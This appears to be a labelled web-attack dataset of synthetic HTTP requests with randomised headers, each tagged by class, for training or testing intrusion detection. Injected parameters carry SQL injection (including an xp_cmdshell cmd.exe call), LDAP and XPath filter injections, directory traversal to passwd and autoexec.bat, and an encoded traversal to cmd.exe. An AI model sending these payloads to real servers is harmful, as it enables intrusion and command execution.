class: LdapInjection
GET /2oO/spOi685e/e5rehxtedo3edpj3Onu/5Cy1IbK/sPDeP3fAirWqt7C/onrerstdg0nnrvbt8rlo/1bTira.Mqi1DX5Omv.swf?TtnhiWoahgstu=amsic%3B&pis2eoSenpg=%29+++%28++%7C%28ctti%3Djso*%29&namlc1iemsvqh=dleh22oQidn5n%2B&kzmeitatW=tgroup+byeu&eb=47&ishmmeebeIdgao5=hee+so+aehKcmdEa&odaederiti5wj=52263887&HnZgVXP=fq3W8SdOq&nm2utmi=odMVMxMB HTTP/1.1
Host: 243.108.184.205
Connection: close
Accept: audio/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: hhfnnf-hscmjepo;q=0.9, mterhC8-ae, h-re8
Cache-Control: min-fresh=2
Client-ip: 214.111.130.134
Cookie: passthruViX=621854;Rspar=irCghp;9iHzoahhsotg=41;r23retiwp7pme=dXFloKY_uQwA;ipositionHwt7OU2=j5n3ete5oesheca
Cookie2: $Version="90"
Date: Sun, 02 Dec 07 17:21:15 UTC
ETag: "OCfbQBx-AQOh@IfI"
Expect: f7mneei=HInyhiqd
From: tdusret@b5koNnc.biz
If-Modified-Since: Fri, 06 Feb 09 23:41:50 CET
If-Unmodified-Since: Tue, 30 Jun 09 05:50:22 GMT
If-Match: "RqDNwMHUxUGyn.37"
If-None-Match: *
If-Range: Wed, 03 Sep 08 21:39:35 UTC
Max-Forwards: 9
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: Basic ZXlkNnJpYTpxRm9tZ3c=
Authorization: Basic cnRhY29nRDppNGRkaHJt
Range: -1768,7868-928309
Referer: http://0tuAG.fr/n9oms4ef/dN1ne/RcBnnee/OeceLn.mdb
TE: chunked;q=0.3
Trailer: Via
User-Agent: YtqGt4tEm (n7yS61St1)
UA-CPU: MIPS
UA-Disp: 117,0811,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 279x383
Via: 7.3 192.84.30.197, HTTP/6.9 45.45.104.166
Transfer-Encoding: gzip
Upgrade: ie8dt4/3.8, nnn/9.0
Warning: 208 www.eiujur.shtml "niihn9Buntieeetne0nn" "Tue, 17 Oct 06 02:46:38 CET"
X-Forwarded-For: 187.158.7.224
X-Serial-Number: 706863
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 38869
Start - Id: 35414
class: SqlInjection
GET /ana6hgegsNpsgct8m/xmlrwvvP71/GxODT2dls/4pxQfqoIw-BcadPh6vB.gif?ntVm=a0dnn%5CselectS%3Ftn3cat-es&FooQG8J=g9n&1WcxSHco=eKYKm&ynpex=%27UNIONALLSELECTfieldFROMtrtaWHERE%27%27+%3D+%27&wtLiE4n0xrhhits=551767&yngFhedIpoprssM=653491155&srne2Nnijrt=+she&E6r=76976274&oXsg5t8dd=1511&gstdinwdlocation.Q02LH=50848&tmaaanevoeii=4650615416&soHpgs=71376947&C54t9elwtepsn=hkmo+denull+set%2BhimlTmo&roe=41036 HTTP/1.0
Host: www.araHneTo.it:80
Connection: keep-alive
Accept: text/*, application/*;q=0.0
Accept-Charset: euc-tw;q=0.6, us-ascii;q=0.0, windows-1250
Accept-Encoding: identity, identity;q=0.6, gzip, deflate;q=0.6
Accept-Language: *
Cache-Control: max-age=52
Client-ip: 67.105.71.5
Cookie: replaceCyMrcpbYJ=srta7ttduurten;meetNmS9dssb=nskp4qdq;RyPmhTMbNxI6=5013294757;hxtdloxyeaG=hD3eB6.
Cookie2: $Version="1"
Date: Tue, 05 Aug 08 08:29:50 CET
ETag: W/"Tt-n2t9gA2mK-4fFk"
Expect: 0tsatea
From: meCo6@c0Onn.it
If-Modified-Since: Sat, 27 Mar 10 04:55:20 CET
If-Unmodified-Since: Thu, 25 Feb 10 24:32:53 GMT
If-Match: "8RG49iRCVabQ3Crs"
If-None-Match: "kIopZ_T@-PF40pP-e"
If-Range: "71sJhQ_j41GbmmWwkj"
Max-Forwards: 1237
MIME-Version: 4.0
Pragma: et=Hiyii65
Proxy-Authorization: Basic YXdpZHY6dzV0cHNoZnI=
Authorization: Digest algorithm=MD5-sess
Range: -236
Referer: /ntnrt.js
TE: chunked;q=0.3,trailers,gzip
Trailer: Host
User-Agent: eawSrsaakus
UA-CPU: Sparc
UA-Disp: 8983,827,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 9837x1680
Via: FTP/5.7 142.135.200.218
Transfer-Encoding: deflate
Upgrade: t8e/8.4, o3tca7/0.1
Warning: 292 225.163.120.85 "z0feceldn" "Sat, 14 Oct 06 01:35:25 UTC"
X-Forwarded-For: 165.157.207.111
X-Serial-Number: 281340124
----: ------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 35414
Start - Id: 41093
class: SqlInjection
GET /szq5erulz5o/EmE1siao2n/IFEGnvUa/ndCiXovO/rXKjkr60P82bdFlXouPQ/ohuivs8ftA.gif?ocCysjsvua7Tuec=sy4aoene&ImU=uUtos&w9=eeo&eatmrsS=52&Sil1cdmtcbfehi=j2+anlhltta+tO&eIbscriptQ=%27%3BEXECmaster.dbo.xp_cmdshell%27cmd.exe&do=o+ormmeoEuiwhere%7Ec&SuxDpNQ=suqc0chomeei0uEgm4%3F&lv7=17608784&ceeunhjteieoi=eu&sonoLy54v=Ceoou&tibetsr9g=lxml%3Esr%29e+orey1f&bbU5cEZR=%3Bcxnetcateue%28copy%24rccn%29co+pe HTTP/1.1
Host: www.seeegfh.be
Connection: keep-alive
Accept: image/*, audio/basic
Accept-Charset: *;q=0.2
Accept-Encoding: deflate;q=0.4, compress;q=0.8
Accept-Language: *
Cache-Control: max-stale
Client-ip: 183.139.157.162
Cookie: i8i=nnsoror$%document]hB;2tt5=uf8I;@C8Q=mrl.NzzK;9D4positionpEU=dTGtK_;a6h=2080;53betweenunullqIwindow.open=4698369279
Cookie2: $Version="21"
Date: Sun, 10 Jul 05 11:19:36 UTC
ETag: W/"pNa_WXpEGDiRA7WpPUNe"
Expect: todx=mj6wd7;rmdo
From: mhst@6auiinb.st
If-Modified-Since: Tue, 26 Apr 05 12:14:35 GMT
If-Unmodified-Since: Thu, 25 Jun 09 22:34:23 UTC
If-Match: "3TsI6EY@dmn7cJp"
If-None-Match: "P72PtUz1UrLbSy6"
If-Range: *
Max-Forwards: 7
MIME-Version: 7.6
Pragma: ttd=meyga
Proxy-Authorization: Digest username="seeg"
Authorization: nedle 4l5o=4osg
Range: 1-877
Referer: http://lr5to.net/s7El/ebsmm/tddanmAf/d3uxsa.aspx
TE: trailers,chunked;q=0.4
Trailer: User-Agent
User-Agent: bCK75n- http://www.hnL0ee.de
UA-CPU: StrongARM
UA-Disp: 2063,773,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 194x0684
Via: FTP/1.7 www.aepqY.css:07
Transfer-Encoding: deflate
Upgrade: trcoos/7.4, ocdNs/3.5
Warning: 451 198.72.245.237:3639 "gyrmlem" 
X-Forwarded-For: 84.186.228.20
X-Serial-Number: 54708069609443708
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41093
Start - Id: 35920
class: XPathInjection
PUT /rX2KrL3uNFnD/nD7Z-T8FXlS/osOeznohtQuthvhsomh/8idckEdsbi/n5rrid3r5sxytusrd/rcnaz.png? HTTP/1.0
Content-Length: 336
Content-Language: erictV
Content-Encoding: deflate
Content-Location: http://www.whetG.be/eoe1b4t/nbz1e/tots/epodu9/ehngDka.cgi
Content-MD5: c243NmV0Z2U0cmdsY2VzYw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 26 Apr 09 08:06:20 CET
Last-Modified: Sat, 08 Oct 05 11:24:15 UTC
Host: 78.252.80.110
Connection: etfmsien
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 176.156.191.232
Cookie: oBHhtblACm=nrirrHws'   or  (i   <   count(iveu/child::text())    and   j    <   count(eldcSS/child::comment())     and   k    <    count(EDtiir/child::*)     )    or     'yotr3sy'    = '     wts5'   or
Cookie2: $Version="8"
Date: Mon, 17 Oct 05 23:28:18 UTC
Expect: 100-continue
If-Unmodified-Since: Sat, 13 Oct 07 09:48:43 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 05 Feb 10 04:27:44 GMT
Max-Forwards: 8
Referer: http://www.teikqzoo.it/2ipc/idai2/frna/7Ihs.dll
User-Agent: Mozilla/3.0 (compatible; 1tesce; Linux i386; trSci; AtoNt7; fTeoos5te)
Transfer-Encoding: cHen9e
Warning: 328 248.132.78.73:926 "lnqan4v" "Mon, 16 Nov 09 16:59:11 UTC"

hr4ooHmcu=171&y9e0eseiHzten=/Vqbgsound&encsjcmdI group by]-tdhi &46rgtsfUr=atoke1xIiHtyo\&aolnempepfym=onhMDwHyY&eEensuCxstvsss=df>za&E0BET=24&wEseo=asBN9Ww6mYd&g8Mrrlulad=oxest3enat&gsen=aH61yKn1PI&kroauNuoetei7=hoh0i&taeGuNdqc=;dimgqi2ie1(window.open&tymbhu=lmle&esc8DmpI= tgir(r&eIbhtal=d@Uu4_afYd2d&rmZI7@M=3522339

End - Id: 35920
Start - Id: 49227
class: XPathInjection
GET /y8.UeR7ebfromTncdlsk/pd/ejexo/betweenS2_goW/Ame4a/t1.jFz4F0bWO0w/4to/sqeVa5onterqidwhetei/sr4Sj77J89H@j1eQ/3tsepqseuah6ibseNbr/gNA0eLiH.shtml?nioAihm=Aa%24do&XerKl=eom&ruc=si3%2FyetoSN%2FRnwd%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D210%5D++++or++%27mhrsobsd%27%3D++++%27&wxrhttrymlee2os=b3n%3B&ewsech=th%26r+eto HTTP/1.0
Host: www.Uatdoy.de:60638
Connection: close
Accept: */*;q=0.7
Accept-Charset: us-ascii, iso-2022-kr;q=0.0, euc-tw, iso-10646-ucs-2
Accept-Encoding: *
Accept-Language: *
Cache-Control: a=ehbek3R
Client-ip: 225.77.96.185
Cookie: oonEjnU=hhtpasseoeezwre;jNdexdotUzr=267656461
Cookie2: $Version="911"
Date: Sun, 15 Aug 04 01:42:29 CET
ETag: "E5Pz1BLK-9C3@Q7bcLV"
Expect: hondotn=eiuen;itoohana=o9un
From: nBas@OeentuDe.cz
If-Modified-Since: Sun, 03 Dec 06 20:11:24 GMT
If-Unmodified-Since: Wed, 05 May 04 02:34:57 CET
If-Match: "IiwbT6McNTNS2gLTg"
If-None-Match: *
If-Range: *
Max-Forwards: 664
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: NTLM b0NpaWVoZW1nbmU3aGVzcW5yaEZ0TG5pZW9lbnNlZ3Rub3JzZGhyQW5laDNsbg==
Authorization: Digest realm
Range: -628
Referer: http://www.lLrw.net/uhtay/oPeseOnt/he3ENn/ejonue1e/4rrenw.msf
TE: deflate
Trailer: Date
User-Agent: t7.@YkNo http://www.fnqp.it
UA-CPU: Sparc
UA-Disp: 2948,912,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 353x220
Via: 6.1 195.149.154.208
Transfer-Encoding: deflate
Upgrade: irn75/4.5, Aednh/6.2, trFh/5.3, nrkms/0.6
Warning: 713 83.69.138.234 "fdz3svieintgegHkWrn" "Sat, 24 Jun 06 11:23:08 CET"
X-Forwarded-For: 159.181.91.193
X-Serial-Number: 312383203635
----: ---------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 49227
Start - Id: 37113
class: LdapInjection
GET /se1htdZyDreErlrveh/wliwdL1/4xgT@hP8zr.ZwqWbI7/eqr8ptsnyreo/e9/iaO9_t6/jau/eZ-2VRt0ojMI6PcOt/aet9neohpce0lyn/0-1O4dh0kMM@qRVWe_/7rcxLuAwF.fwv.js?rtttafs=4h96JfFcRJ&iwoh2el7t=%29%28++%7C+++%28displayName%3Dhad*%29++++%28name++++%3D++had*++%29%28++mail%3Dhad*%29&onnrngeer=+htnneidYFE&lnojx=05323662 HTTP/1.0
Host: 191.184.11.19
Connection: dqbs
Accept: image/png;q=0.9
Accept-Charset: iso-8859-3;q=0.8
Accept-Encoding: *
Accept-Language: ra21eea-ne, p-2gxt;q=0.1
Cache-Control: max-age=6536
Client-ip: 82.149.38.78
Cookie: mearnpewjre0a6=st;esil2ceoU=whis 
Cookie2: $Version="656"
Date: Wed, 04 Jun 08 16:34:28 GMT
ETag: W/"qI2oENPhGRoQTyWi6-C"
Expect: 100-continue
From: ke6iat@otEmem.org
If-Modified-Since: Mon, 22 Oct 07 04:21:29 GMT
If-Unmodified-Since: Sun, 15 May 05 13:27:38 CET
If-Match: *
If-None-Match: "YaYrghb5gmtE5xvyi@P"
If-Range: "hSj..vl.bW0DN9X1qDQ8"
Max-Forwards: 2793
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Basic ZWVKbmI6ZGk1OHI=
Authorization: Digest cnonce="cvdipt"
Range: -12929,-403
Referer: /yteoijSr/r1ttt/dird83e/tnac/adtce.wav
TE: trailers,gzip;q=0.2
Trailer: Accept-Language
User-Agent: Mozilla/5.8 (Machintosh; U; PPC 4.4; ce-mi; rv:7.6.2) Gecko/42875608
UA-CPU: 68000
UA-Disp: 529,581,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 617x3755
Via: e5szau/6.4 18.20.166.38, 2.7 59.35.105.170:87, FTP/5.3 www.tperrQln.jpeg:10500
Transfer-Encoding: compress
Upgrade: rPog/6.3, anziha/1.6, Aaolrp/4.1, ige/4.9, mu8/9.9
Warning: 296 92.253.127.230:14 "0shhdnca" "Sun, 22 Feb 04 22:26:45 CET"
X-Forwarded-For: 67.99.234.48
X-Serial-Number: 4738976742686812
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37113
Start - Id: 44773
class: PathTransversal
GET /no4tiq2s5tr/4A8Fa4processing-instructionAKinputc/7UsZC/Sbttnte/dSkMcBPfjOro/Rd9hwneigttenaEC.css?xGwHr_IHNfromS_=56748118&5golniDdid=8313572993&chaiehd6iepeeyo=sRAP&threh=%24&qQKMLb@replace_om=..%2F..%2F..%2Fusr%2Fdsqqdsqsd.xml&PKxosamXnS.AT=e7g&swe8ne3sett9q=60824437&txetPPts=wI2ns&stS7YoJ=+4e%40z&tfs7keqfkii=t%5Cr7ratm%3B9qservicesS%3Dnrj HTTP/1.1
Host: www.eoibaxeaho.uk
Connection: close
Accept: */*;q=0.8
Accept-Charset: iso-8859-3, windows-1251, iso-8859-2;q=0.9, x-mac-arabic;q=0.2
Accept-Encoding: gzip;q=0.6, compress, gzip
Accept-Language: *;q=0.0
Cache-Control: max-age=38
Client-ip: 7.176.110.139
Cookie: eenru7er=aaeei;lydnwkcir=uRuhtq&5tJEhenV;efxssm=90;Ena1gqdgmAg=un
Cookie2: $Version="123"
Date: Mon, 24 Aug 09 19:20:03 GMT
ETag: W/"jG0mx5PG2xZN@2MUK"
Expect: 100-continue
From: sfn2@eoeOs.net
If-Modified-Since: Sat, 29 Jan 05 11:21:50 CET
If-Unmodified-Since: Wed, 08 Nov 06 18:45:19 CET
If-Match: "6swJW686489nu8vGnDm"
If-None-Match: "Ks7Z-O88BuIHpSXjG"
If-Range: Wed, 23 Jul 08 11:47:37 CET
Max-Forwards: 216
MIME-Version: 1.4
Pragma: tiqhp9s='rt3Tise'
Proxy-Authorization: Digest realm
Authorization: fkFode iligm=zegse
Range: 6578-336232,-258470,45228-5909
Referer: http://exslt.st/i1oor/gqOeahfH/orpc/eess/c8Na.txt
TE: trailers,deflate
Trailer: Authorization
User-Agent: Mozilla/0.6 (Windows; U; Win 9x 0.7; hl-ni; rv:6.1.3) Gecko/28538065
UA-CPU: Sparc
UA-Disp: 3445,5667,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 822x152
Via: tles/3.0 www.m5eaao.tiff:5
Transfer-Encoding: compress
Upgrade: xdn/6.9, zath/4.3, enftae/3.8, tsot/2.4
Warning: 651 www.ohli.jpeg "ze4iSksESreE" 
X-Forwarded-For: 39.131.202.145
X-Serial-Number: 2157159271334
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44773
Start - Id: 42059
class: SqlInjection
GET /9drpwtra4c/dUlxsikls5wEo3_RcRO.png?abesedittnto9c=7aa6oa&dnuDcsrndtsc6ey=6wh&pyah7teeny6bcaY=705571094&c3wati7nletwrl=h%3CeHchildxwidt%27%27u&tttido3lglggtSs=310749&hbinHb0dxOI=%3E%25hnebnser%3AHnaccept&evaEe=cm7eAzrvHx&ndroX3vnr7ninz=n&nSctEpee=uawdeeaxNne7sy6rrf&een4m7nye=emeoth&eSt=110517&rriDo=%27+++group++++by++++users.id+having++0459%3D0459&BVEqAAhV=ei1OP&sraey=fth8&tdebaycGl=uniond%29en HTTP/1.0
Host: 56.222.56.195:80
Connection: erOi
Accept: text/html, application/*;q=0.2
Accept-Charset: x-mac-chinesesimp;q=0.5, iso-8859-4;q=0.8, iso-8859-5;q=0.7, x-mac-ce;q=0.6
Accept-Encoding: *
Accept-Language: etutmn-ckes;q=0.8, tciEz-4kse;q=0.6, tT-GnhdT
Cache-Control: no-transform
Client-ip: 154.191.132.233
Cookie: 8IRoptAcZq=%apc
Cookie2: $Version="46"
Date: Sun, 13 Mar 05 10:59:14 GMT
ETag: W/"0OzoIBhLz0TEHDP7"
Expect: 100-continue
From: lhrrhh9j@48Flats.biz
If-Modified-Since: Fri, 05 Jan 07 07:27:18 GMT
If-Unmodified-Since: Wed, 11 Feb 04 05:40:43 UTC
If-Match: *
If-None-Match: *
If-Range: "w5RYOz85gXktcR8g"
Max-Forwards: 5653
MIME-Version: 0.9
Pragma: od6aof='h'
Proxy-Authorization: Basic c3VubzpuZWdhZA==
Authorization: Basic aWN5NXA6VWVFaG50aHI=
Range: -99729
Referer: http://nehtoe.de/aite8oe.aspx
TE: deflate,trailers,trailers
Trailer: Range
User-Agent: vgsSatt
UA-CPU: Sparc
UA-Disp: 7502,392,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 927x5675
Via: 9.8 150.228.124.21:5337, HTTP/1.6 www.emooteM.png
Transfer-Encoding: tut2ei; aehnijo=uir4h
Upgrade: Ens/2.7, ieoa/3.9, 4tt/2.8, ind/4.0, sute/1.0
Warning: 264 99.10.30.250 "a0gtsj1ecytcw5Eqrc" 
X-Forwarded-For: 206.224.167.230
X-Serial-Number: 001394948859071824
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 42059
Start - Id: 37991
class: LdapInjection
GET /nl/6FD@/ztrqnI2nce3Is/d1t6s3yuet3istxm1/aQGWb1piSgbwJ.Yh3Fx/IeomV1nstuAFifh/j6i@oc.TRFifZuFCwqJ/sN1ae/MmfcBt/eSanwheiaUG0ndexn/iujecowslml10.sh?tnaudatca=7889&eLlnmn=0326023368&terslt7ht=%7Cqa&nceransk=807069987&dIndt3Sscieu1s=e2VaorsdmoLs3Oimf&iasarftlrnsp=%40Aq&fsen=erautyygg&UySkoahl=2&cetce@q5OMmdservices=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&iz=+%244%7C&lfSroaoaep=733742640&oO.K-=08524&en1t6o6tUoesn=tmailao&77HcGI=dngdivd%7C0 HTTP/1.0
Host: www.coswui.gov
Connection: keep-alive
Accept: video/mpeg;q=0.8, image/jpeg
Accept-Charset: windows-1255;q=0.1, x-mac-icelandic;q=0.0, windows-1257;q=0.5
Accept-Encoding: *
Accept-Language: nnptscea-oonpihyr;q=0.1
Cache-Control: max-stale=6516
Client-ip: 181.41.234.72
Cookie: 8uorvoda08toasj=i
Cookie2: $Version="279"
Date: Wed, 16 Dec 09 08:31:00 GMT
ETag: W/"X6DZQRvQqkAgn7Mj"
Expect: 100-continue
From: peRu9mr@dtroN.gov
If-Modified-Since: Wed, 11 Aug 04 15:04:12 UTC
If-Unmodified-Since: Tue, 27 Jun 06 21:44:04 UTC
If-Match: "8aKcEsg1XHUUpGgd"
If-None-Match: *
If-Range: Sun, 07 Jun 09 02:16:55 CET
Max-Forwards: 80
MIME-Version: 4.1
Pragma: triEo=aaedOn
Proxy-Authorization: Digest opaque="tnharvec"
Authorization: Digest response="dAd5FcB57E0C5AB9ea90BC841f0938cc"
Range: 4893-,-7197
Referer: http://www.tkoe.uk/lelnie/Om54d/duzrEo/t7s99gw/ypegeift.avi
TE: chunked,trailers,trailers
Trailer: Warning
User-Agent: wtitul/1.5
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 8848x2681
Via: HTTP/8.5 www.5tnags.html, ri6eh/6.2 32.182.122.128, 6.9 www.ieeT.jpeg:08
Transfer-Encoding: offjmi
Upgrade: 9aaia/6.6
Warning: 618 www.S7Ee.shtml "ejee2ebqDsA" 
X-Forwarded-For: 189.40.115.224
X-Serial-Number: 800649
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37991
Start - Id: 35979
class: PathTransversal
GET /FnlO/iaWZisuG4vmZXGDrMg/8tHnuuieshiihhbco/O0e/rDrTSYDFszVEDl7G/l1wDS/opfnadsw3hE/eqO6HuFVaV4tcg/Z7P76cZjZ9mkI/gE_vzye-7xp_f.htm?h5htT=66&rfCaqH=c.3G.cxQ&tcosghpacti6ehh=a5Y&d6c0rk=Bef0b50m&ezeahifTnlvqGa=sb&thmPit=ssw6-TDq61&01OCs=7&fhyi=rtretwhere%2Fr%26%7Cq&aeeh=ngri+o+%3F%3B%5Dpasswdt&rwtnse2tee8o=oaM&odoa8zn=874832756 HTTP/1.0
Host: www.eg8ent.it
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: deflate
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 18.8.173.221
Cookie: nelk=../../../WINNT/autoexec.bat
Date: Tue, 16 Jun 09 20:00:22 CET
ETag: "e0MA_vpn5kxxoZ2"
If-Match: *
If-None-Match: "FLhg7SSf8PIl_niIHa"
If-Range: Wed, 28 Feb 07 07:54:50 GMT
Max-Forwards: 5389
MIME-Version: 6.0
Referer: http://5nrn.uk/eoe2/dxtwxs/jeosca5e.php4
User-Agent: eslIJx http://www.Salkceao.org
Via: 3.7 233.200.107.120:10887, 8.6 210.132.40.132:7, 2.9 44.201.168.105:4397
Transfer-Encoding: identity

null

End - Id: 35979
Start - Id: 37704
class: LdapInjection
POST /pssyWfR/bodyo/QcopyXjM/eacrDavewtglcpsyWca.nsf? HTTP/1.0
Content-Length: 176
Content-Language: oIl,Saib,ola
Content-Encoding: identity
Content-Location: http://www.wrxeeT.uk/teosaWh/cies8nt4/oga4fua.swf
Content-MD5: Y2FydFN0d090TG51SWx1dA==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Wed, 16 Feb 05 16:10:25 UTC
Host: www.arYsi.uk
Connection: keep-alive
Accept: application/*, audio/*, image/jpeg;q=0.1
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.7
Accept-Language: WeivtD-7ibrzot;q=0.2, j-s0sSe
Client-ip: 34.254.110.38
Date: Fri, 03 Sep 04 04:32:59 GMT
If-Modified-Since: Sat, 24 Mar 07 19:03:29 CET
If-Range: Wed, 01 Mar 06 13:56:01 GMT
Max-Forwards: 118
Pragma: no-cache
Referer: /aoticii/snor/tOjtoif/tv0i/ytiooo.js
TE: gzip;q=0.4
User-Agent: Mozilla/2.7 (compatible; Konqueror/5.2; Unix; ksroRm02to)
Transfer-Encoding: identity

a7tie0t= &gonwte=ro59oKto492Te&e0ocojocniaiin9=oizr)(&(objectClass= nre*)&mailpkWfr5pW=icaelvHhseos&a2otn=sTnph-a&rgle=1copy~boot.init&ehuarxe5AwtcbMa=Tnenoh~iI

End - Id: 37704
Start - Id: 35281
class: SqlInjection
GET /wi9bcnnqrhtsr62dh4/ezIH28Fbvv99LSe_/vnoCbwdj7etzit4daNws/W6kedtaidrfe4/hKyT@/XZBRt/uq9ixRFv/eTGuqE2-Xe.htm?pbnaRcxorEaens=0&scy=tn%2F7uitt%24horLr&ehetaesystyiseU=%27+++++group+by+++users.id+++having+++++8527%3D8527&nonPeb6i=3&tvanhe5ttssnesi=87100734&txKoadowlpj=gIti&Zmoikmhrsvr=cnc&5dfnief=ein%3D%3Fi&tohehbem=dpasswdfsr&eealsinnic=1816448 HTTP/1.1
Host: 248.29.119.21
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: doterwUw-ie65;q=0.4, 5S-e;q=0.5, ae6ntrel-yieb5vaa;q=0.2, ioos-ysyet6, ae-metudf
Cache-Control: max-age=03305
Client-ip: 155.132.155.102
Cookie: 2icmaPHf=cUaryi;Qss3=417665
Cookie2: $Version="2"
Date: Sun, 14 Nov 04 22:10:01 UTC
ETag: W/"MeA2g_N_dUPfr6kUO"
Expect: 4onddn=eeoa33k;1ertegD=xiSjeb90
From: B9ir@tOlwn.gov
If-Modified-Since: Sat, 07 Aug 04 01:41:11 GMT
If-Unmodified-Since: Thu, 14 Apr 05 21:49:29 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 16 Feb 06 19:09:52 UTC
Max-Forwards: 664
MIME-Version: 8.3
Pragma: ptUn=nl
Proxy-Authorization: Digest cnonce="oCgves"
Authorization: Digest nc=2CdfbeAc
Range: 930-456,2355-
Referer: http://www.fWstn3vr.cz/fdhms/eeloiMi/beEI/he7HTeN.jpeg
TE: trailers
Trailer: Proxy-Authorization
User-Agent: okqs/3.2.5
UA-CPU: StrongARM
UA-Disp: 420,4746,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 827x876
Via: HTTP/0.1 www.diesfe.gif:9
Transfer-Encoding: compress
Upgrade: bkt1c/0.9, a15/2.9, cEsxaa/0.5
Warning: 590 39.82.178.253 "aiHe" 
X-Forwarded-For: 162.78.14.7
X-Serial-Number: 045069362668
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35281
Start - Id: 36436
class: OsCommanding
GET ..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 228.85.180.105
Connection: keep-alive
Accept: video/mpeg, image/*
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: Cit8veCg-ydal, ihneoa-sh, atu3vrlo-opr;q=0.7, t8Hp-wtito, taizf-pVS;q=0.4
Cache-Control: no-transform
Client-ip: 43.227.10.174
Cookie: nmEiiesisSahp=r30wFPa9
Cookie2: $Version="63"
Date: Fri, 15 Apr 05 11:01:02 GMT
ETag: W/"u4HtIBSrU_SJ2Q3p6Q"
Expect: ajatsei7=hn7Hs
From: AtjrnsE@aethffn.uk
If-Modified-Since: Fri, 23 Jan 04 01:41:08 UTC
If-Unmodified-Since: Fri, 03 Jul 09 24:49:25 GMT
If-Match: "4dBcvQg5UBtZjQ2p"
If-None-Match: *
If-Range: Sun, 15 Jan 06 14:30:56 CET
Max-Forwards: 7090
MIME-Version: 0.7
Pragma: c2fqred=Ddnj
Authorization: Basic ZUFhbzpvdHRzcmE2
Referer: http://tzgt.fr/2z6e/4nher3i.mpg
TE: gzip
Trailer: Trailer
User-Agent: KOltEuly (oLyuDMwkuG)
UA-CPU: PowerPC
UA-Disp: 5073,578,16
UA-Color: color8
UA-Pixels: 006x6469
Via: ran/7.4 www.ml9ocat.jpeg, 7.0 www.ebswlm.jpeg
Transfer-Encoding: deflate
Warning: 176 3.53.123.242 "nltteLtvtattssrC" 
X-Forwarded-For: 113.116.65.59

null

End - Id: 36436
Start - Id: 49415
class: XPathInjection
GET /tEwUUKQzO8hjAa/ep/uuyhhbMUYntrL6EwOBe/YebzyOf/44enWlrm0dynjrcts.shtml?7jqY2passwdtb-Ub=2&a6iilafC5of1r=015407139&Oosgsweakm=24338679&SjlhSMi8hbs=eIe&euotthoanlmryo=qk%27++++or+6++++%3C+++count%28path%2Fchild%3A%3A*%29+++++or+++++%27taecEd%27+++%3D%27&husoqfngjy=168977&apF9n3m1=+9tZ HTTP/1.0
Host: www.oenpe.st
Connection: keep-alive
Accept: image/gif;q=0.1, audio/x-wav
Accept-Charset: isiri-3342;q=0.6, windows-874;q=0.8, x-mac-ce, hz-gb-2312
Accept-Encoding: 
Accept-Language: oh-eresew;q=0.7, 8wi-tbnDtn6
Cache-Control: no-cache
Client-ip: 93.18.190.156
Cookie: in692knqgY-S=nAt4jh3l;7elr4Afyjedabt=\h:Hnna|)56@stits]iu;tceao=$ewoeeehe whereEcmaildC;tqoh4srbl=am
Cookie2: $Version="37"
Date: Sun, 31 May 09 01:17:02 CET
ETag: W/"rUzInsOwOf8G0X7o-"
Expect: 100-continue
From: 2etopwi@exrhsnpxt.org
If-Modified-Since: Sat, 25 Jul 09 09:05:12 UTC
If-Unmodified-Since: Fri, 22 Dec 06 12:56:08 GMT
If-Match: "_9QTrUaBVPXaYoFY1"
If-None-Match: *
If-Range: *
Max-Forwards: 4994
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: Basic bmhvaW9vOnR0bm9zdTY=
Authorization: Digest realm
Range: 77585-376599
Referer: /ndcl/scqd1i/unemnmsf.nsf
TE: trailers,gzip
Trailer: Cache-Control
User-Agent: gellrldeoi/3.2.8
UA-CPU: StrongARM
UA-Disp: 422,204,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 334x4748
Via: roOe/0.5 www.yjarcai.png:6
Transfer-Encoding: Siei; oNeceuc=orfFi
Upgrade: dec/5.5, 4kklt/1.7
Warning: 222 29.185.139.144 "meri5fe" "Sun, 16 Aug 09 09:30:25 UTC"
X-Forwarded-For: 151.48.131.243
X-Serial-Number: 812184590933752195
----: -------------
